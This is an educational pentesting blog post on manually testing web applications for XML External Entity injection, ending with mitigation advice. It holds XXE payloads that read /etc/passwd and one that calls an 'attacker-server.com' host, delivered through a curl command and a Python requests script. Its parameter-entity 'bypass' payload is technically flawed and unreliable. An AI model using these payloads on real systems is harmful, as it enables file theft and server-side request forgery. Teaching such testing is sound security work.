Learn Pentesting: Manual Testing for XML External Entity Injection

XML External Entity (XXE) Injection remains one of the classic vulnerabilities in web applications that process XML input. In this post, we’ll explore the fundamentals of XXE, discuss its potential impact, and provide a comprehensive, step-by-step guide on how to manually test for this vulnerability during a penetration test. This guide is part of our “Learn Pentesting” series and is intended for seasoned security professionals and aspiring penetration testers.

Introduction

XML is widely used for data interchange in web applications, and many systems incorporate XML parsers that, if misconfigured, might be vulnerable to XXE injection. XXE can allow an attacker to read local files, perform server-side request forgery (SSRF), or even execute further attacks depending on the environment. In this article, we dive deep into manual testing for XXE vulnerabilities, equipping you with practical methods and code examples to confidently assess and exploit these vulnerabilities in a controlled testing environment.

Understanding XXE Injection

XXE injection occurs when an XML parser processes external entities defined within XML documents. By including a maliciously crafted DOCTYPE declaration, an attacker can instruct the parser to include external content. A classic example is reading sensitive files from the server, such as /etc/passwd on Unix systems.

How It Works

XML Parsing: When an XML document with a DOCTYPE is parsed, the parser attempts to resolve any external entities.
Entity Definition: The attacker defines an external entity that references a local or remote resource.
Entity Expansion: If the parser is misconfigured (i.e., not secured against external entity resolution), it will expand the entity and embed the content into the XML processing flow.
Resulting Impact: This may lead to data disclosure, SSRF, or other types of exploits.

Identifying Potentially Vulnerable Endpoints

Before testing for XXE, it’s important to identify endpoints that process XML input. Look for:

SOAP Services: Web services often use XML for message formatting.
RESTful APIs with XML Payloads: Even if JSON is common, many legacy systems still use XML.
File Uploads or Data Import Features: Some applications allow XML uploads for configuration or data import.

Review documentation, analyze network traffic, or intercept requests using a proxy tool like Burp Suite to identify potential XML processors.

Crafting an XXE Payload

A well-crafted payload is essential for testing. The basic idea is to define an external entity in the XML document that references a local file. Below is an example payload designed to read the /etc/passwd file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Key Points

DOCTYPE Declaration: Introduces the entity definition.
ENTITY Definition: xxe is defined to load the content of /etc/passwd.
Entity Reference: &xxe; instructs the XML parser to insert the file’s content.

For blind testing or SSRF scenarios, you might want to define an entity that points to an external server you control. For example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker-server.com/evil">
]>
<foo>&xxe;</foo>

This can be useful when the response does not directly include the content but you suspect an outbound request is made.

Manual Testing Techniques

Using cURL

cURL is a convenient command-line tool for sending HTTP requests. Here’s how you can use it to test for an XXE vulnerability:

curl -X POST -H "Content-Type: application/xml" --data '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>' http://targetapp.com/api/endpoint

Steps:

Set the Content-Type header to application/xml.
Include the XXE payload in the request body.
Submit the request to the identified XML processing endpoint.
Analyze the Response: Look for signs of file content (e.g., typical Unix user information) in the response body.

Using Python Requests

For a more programmable approach, the Python requests library can be employed. This method allows you to script the test and easily automate multiple tests:

import requests

url = "http://targetapp.com/api/endpoint"
headers = {"Content-Type": "application/xml"}

payload = """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
"""

response = requests.post(url, data=payload, headers=headers)
print(response.text)

Steps:

Define the target URL and headers.
Create the payload with the malicious DOCTYPE and entity reference.
Send the POST request using the requests library.
Print and analyze the response for evidence of the file content.

Both methods provide a straightforward way to determine if the XML parser is vulnerable to XXE.

Analyzing Responses

After sending your payload, carefully examine the HTTP response:

Direct Output: The response may include the contents of /etc/passwd or another targeted file. Look for typical content such as system user entries.
Error Messages: Some XML parsers return errors that reveal configuration details, which may also indicate XXE vulnerability.
Out-of-Band Interactions: If you use an external entity pointing to a server you control, monitor that server for inbound requests. Tools like Burp Collaborator can automate this process.

It’s important to compare the response against what is expected from the application. A lack of direct output does not necessarily mean the application is secure; it could be configured to not reveal such details or the file in question may be empty.

Advanced Techniques and Bypasses

When basic payloads do not work, consider advanced techniques:

Bypassing Entity Restrictions: Some parsers might restrict external entities but allow parameter entities. Try modifying your payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY xxe "%file;">
]>
<foo>&xxe;</foo>

Blind XXE with OOB Data Exfiltration: When direct responses aren’t available, using an external URL can confirm the vulnerability.
Nested Entity Expansion: In complex scenarios, nesting entities might bypass simple security filters.

Experimenting with variations can help uncover cases where the parser implements partial restrictions.

Mitigation Recommendations

For developers and security professionals, it’s critical to secure XML parsers against XXE attacks:

Disable External Entities: Configure the XML parser to disable external entity resolution.
Use Secure Libraries: Where possible, use libraries known for secure XML processing.
Input Validation: Ensure robust input validation and sanitization for XML inputs.
Least Privilege: Run services processing XML with minimal privileges to reduce the impact of a potential breach.

Implementing these practices will significantly reduce the risk of XXE attacks.

Conclusion

Manually testing for XML External Entity Injection requires a detailed understanding of XML parsing and careful crafting of payloads. In this post, we’ve covered the key concepts behind XXE, demonstrated manual testing methods using both cURL and Python, and discussed advanced techniques for bypassing filters. Armed with these techniques, penetration testers can more effectively assess and remediate XXE vulnerabilities in their environments.

Keep exploring, keep testing, and stay secure.